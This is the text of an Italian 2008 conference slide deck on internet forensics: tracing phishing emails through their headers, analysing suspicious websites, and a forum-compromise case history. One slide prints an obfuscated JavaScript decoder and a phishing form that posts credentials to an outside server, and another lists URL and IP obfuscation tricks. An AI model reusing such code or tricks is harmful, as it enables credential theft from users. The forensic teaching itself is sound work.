Post on 04-Jun-2015
description
Gianni Amato http://www.cfitaly.net 1
INTERNET FORENSICS
di Gianni Amato18/06/2008
Convegno CFItaly – Libera Università degli Studi S. Pio V, Roma
http://www.cfitaly.net 2Gianni Amato
About me (in breve) Ricercatore indipendente Pentest & Vulnerability Assessment Consulente di sicurezza informatica Collaborazioni
Internet MagazineAssociazione Meter
http://www.cfitaly.net 3Gianni Amato
Internet non ha confini!
Chi crede di rimanere anonimo finché non fornisce i propri dati personali si sbaglia di grosso.
http://www.cfitaly.net 4Gianni Amato
Reati commessi su Internet
Reati commessi mediante Internet
Internet Forensics?
http://www.cfitaly.net 5Gianni Amato
pedopornografia terrorismo phishing frodi ...altre tipologie di reato
diffamazioni, violazione della sfera personale, spam, defacing, intrusioni, malware...
Quali reati?
http://www.cfitaly.net 6Gianni Amato
Individuare e valutare le cause; Analizzare e comprendere le
dinamiche; Documentare e fornire gli indizi;
Iter
http://www.cfitaly.net 7Gianni Amato
Phishing: tutto parte da una (fake) email (?)
Social Engineering ..lo studio del comportamento individuale di
una persona al fine di carpire informazioni.
http://www.cfitaly.net 8Gianni Amato
Generati casualmente Acquistati Bot a caccia di chiocciole
Come recuperano gli indirizzi email?
http://www.cfitaly.net 9Gianni Amato
Vero o falso?
Partiamo dagli headers Percorso (MTA) seguito dall'email per raggiungerci (Recived:)
disposto in ordine inverso Data, ora, protocollo, indirizzo ip
?Oggetto: Eseguiamo la manutenzione delle nostre misure di sicurezzaDa: "Poste italiane" <Admin@bancopostaonline.poste.it>Rispondi: "Poste italiane" <Admin@bancopostaonline.poste.it> Data: 29/05/2008 18:26A: guelfoweb@gmail.com
http://www.cfitaly.net 10Gianni Amato
DeliveredTo: guelfoweb@gmail.com
Received: by 10.142.162.2 with SMTP id k2cs28985wfe;
Thu, 29 May 2008 09:26:09 0700 (PDT)
Received: by 10.86.54.3 with SMTP id c3mr4230fga.55.1212078368105;
Thu, 29 May 2008 09:26:08 0700 (PDT)
ReturnPath: <Admin@bancopostaonline.poste.it>
Received: from smtp21.orange.fr (smtp21.orange.fr [80.12.242.48])
by mx.google.com with ESMTP id l12si757120fgb.8.2008.05.29.09.26.04;
Thu, 29 May 2008 09:26:08 0700 (PDT)
ReceivedSPF: neutral (google.com: 80.12.242.48 is neither permitted nor denied by best guess record for domain of Admin@bancopostaonline.poste.it) clientip=80.12.242.48;
AuthenticationResults: mx.google.com; spf=neutral (google.com: 80.12.242.48 is neither permitted nor denied by best guess record for domain of Admin@bancopostaonline.poste.it) smtp.mail=Admin@bancopostaonline.poste.it
Header
http://www.cfitaly.net 11Gianni Amato
Received: from User (ks3825.kimsufi.com [213.186.40.121])
by mwinf2114.orange.fr (SMTP Server) with ESMTP id AB8AC1C0011C;
Thu, 29 May 2008 18:26:03 +0200 (CEST)
XMEUUID: 20080529162603702.AB8AC1C0011C@mwinf2114.orange.fr
From: "Poste italiane" <Admin@bancopostaonline.poste.it>
Subject: Eseguiamo la manutenzione delle nostre misure di sicurezza
Date: Thu, 29 May 2008 18:26:03 +0200
MIMEVersion: 1.0
ContentType: text/html;
charset="Windows1251"
ContentTransferEncoding: 7bit
XPriority: 3
XMSMailPriority: Normal
XMailer: Microsoft Outlook Express 6.00.2600.0000
XMimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
MessageId: <20080529162603.AB8AC1C0011C@mwinf2114.orange.fr>
Header
http://www.cfitaly.net 12Gianni Amato
whois traceroute blacklist
http://mxtoolbox.com/blacklists.aspx
Interrogare i server, i motori di ricerca e le blacklists
http://www.cfitaly.net 13Gianni Amato
Criminali furbi
Fake headers Proxy anonimi (HTTP Proxy, SOCKS, ecc.) Relay aperti (SMTP) Reti WiFi aperte o poco protette Botnet
http://www.cfitaly.net 14Gianni Amato
Url encoding http://www.sitoweb.it/?url=sitotarget.it http://www.sitoweb.it/?url=%67%6F%6F%67%6C%...... IP : 22.22.22.22 Octal : 0026.0026.0026.0026 Hex : 0x16.0x16.0x16.0x16 Dotless: 370546198
http://www.cfitaly.net 15Gianni Amato
Analisi di un sito web
Analisi preliminare Analisi del codice Indagini temporali Indagini avanzate
http://www.cfitaly.net 16Gianni Amato
Analisi preliminare Navigare e catalogare il sito Individuare i collegamenti relativi
es. css e script esterni Il codice fa la differenza
http://www.cfitaly.net 17Gianni Amato
Fake <iframe>
code injection
xssSfruttare le vulnerabilità dei siti web per iniettare codice arbitrario
Analisi preliminare
http://www.cfitaly.net 18Gianni Amato
Fake
Analisi preliminare
http://www.cfitaly.net 19Gianni Amato
Analisi del codice Scaricare il codice sorgente in locale
Browser (Firefox, Opera, Internet Explorer) Amaya Wget
wget m k http://www.sitoweb.it
n.b. fare attenzione ai limiti di banda
http://www.cfitaly.net 20Gianni Amato
Analisi del codice Interpretare la struttura del codice
Codice lungo e poco ordinato Meccanica incomprensibile
soprattutto se il codice è offuscato Link, tag e formattazioni
http://www.cfitaly.net 21Gianni Amato
Escape e Unescape; Base64; 1000 modi per inventarsi una funzione di
codifica;
Analisi del codiceJavascript
http://www.cfitaly.net 22Gianni Amato
Ok, ora è tutto chiaro !?
Analisi del codice
http://www.cfitaly.net 23Gianni Amato
Analisi del codice
Commento <!hppage status”protected”>
Esiste sempre un punto di partenza document.write(unescape(“%3C%53%43...
http://www.cfitaly.net 24Gianni Amato
<SCRIPT LANGUAGE="JavaScript"><!hp_ok=true;function hp_d01(s){if(!hp_ok)return;var o="",ar=new Array(),os="",ic=0;for(i=0;i<s.length;i++){c=s.charCodeAt(i);if(c<128)c=c^2;os+=String.fromCharCode(c);if(os.length>80){ar[ic++]=os;os=""}}o=ar.join("")+os;document.write(o)}//></SCRIPT>
<form name="Form_Auth" action="http://www.biohasardz.com/memo/images/1.php" method="post">...........
script code
Credential Stealer
Analisi del codice
http://www.cfitaly.net 25Gianni Amato
Analisi del codice Individuare (se presenti) i metadati
alcuni software utilizzati per lo sviluppo delle pagine web aggiungono informazioni al codice
Nome del programma utilizzato Il nome dell'autore autore Numero di revisioni Data e ora
http://www.cfitaly.net 26Gianni Amato
<!DOCTYPE HTML PUBLIC "//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD>
<META HTTPEQUIV="CONTENTTYPE" CONTENT="text/html; charset=utf8"><TITLE></TITLE><META NAME="GENERATOR" CONTENT="OpenOffice.org 2.3 (Linux)"><META NAME="AUTHOR" CONTENT="guelfoweb"><META NAME="CREATED" CONTENT="20080614;18464300"><META NAME="CHANGEDBY" CONTENT="guelfoweb"><META NAME="CHANGED" CONTENT="20080614;18472200"><STYLE TYPE="text/css"><!
@page { size: 21cm 29.7cm; margin: 2cm }P { marginbottom: 0.21cm }
></STYLE>
</HEAD><BODY LANG="itIT" DIR="LTR"><P STYLE="marginbottom: 0cm">questa è una pagina web</P></BODY></HTML>
Analisi del codice
http://www.cfitaly.net 27Gianni Amato
Analisi del codice Indizi da non trascurare
Errori Commenti Istruzioni commentate
Possono fornire importanti informazioni!
http://www.cfitaly.net 28Gianni Amato
Indagine temporale
The Wayback Machine archive.org
Google Cache
Evoluzione del sito e vecchi contenuti
http://www.cfitaly.net 29Gianni Amato
Indagine avanzata Directory listings Hidden directories Hidden files Hidden subdomains
http://www.cfitaly.net 30Gianni Amato
Indagine avanzata
http://www.cfitaly.net 31Gianni Amato
Le direttive del file robots.txt invita gli spiders dei motori di ricerca a non
leggere o non indicizzare determinate pagine web;
aiuta gli investigatori a individuare i contenuti che il webmaster ha scelto, per qual si voglia motivo, di tenere nascosti;
Indagine avanzata
http://www.cfitaly.net 32Gianni Amato
Non utilizzare tools aggressivi che potrebbero compromettere il sistema e di conseguenza infangare le prove
Indagine avanzata
http://www.cfitaly.net 33Gianni Amato
Case history
Dalla pedopornografia al virus passando per un forum.
Associazione Meter – Don Fortunato Di Noto
http://www.cfitaly.net 34Gianni Amato
Case history
All'interno del forum del sito web (xxx), oggetto di indagine, sono state rilevate immagini a carattere pornografico e pedopornografico
Associazione Meter – Don Fortunato Di Noto
http://www.cfitaly.net 35Gianni Amato
Case history
Dalle indagini è emerso che il forum era stato abbandonato da quasi 3 anni; era stato compromesso sfruttando una
vulnerabilità nota della piattaforma di gestione; erano state inserite delle keywords per scalare
posizione nei motori di ricerca;
Associazione Meter – Don Fortunato Di Noto
http://www.cfitaly.net 36Gianni Amato
Case history
Dalle indagini è emerso che la presenza di immagini pornografiche e
pedopornografiche era solo un pretesto per invitare l'utente a cliccarci sopra e scaricare un trojan che si spacciava per un codec;
il trojan implementava funzionalità di backdoor che consentiva ai criminali di creare un botnet;
Associazione Meter – Don Fortunato Di Noto
http://www.cfitaly.net 37Gianni Amato
Case history
Dalle indagini è emerso che il trojan risiedeva su un server straniero; una volta infettata la macchina, il trojan
comunicava con diversi siti su server stranieri; le date di registrazione dei siti coincidevano o
differivano di qualche giorno;
Associazione Meter – Don Fortunato Di Noto
http://www.cfitaly.net 38Gianni Amato
Case history
Tra il 2007 e 2008 sono stati individuati 15 casi analoghi
Principali vittime: Comuni Scuole Università
Associazione Meter – Don Fortunato Di Noto
http://www.cfitaly.net 39Gianni Amato
CONTATTI
Gianni Amato http://www.gianniamato.it
EMail: gianni@gianniamato.itCell. +393202842382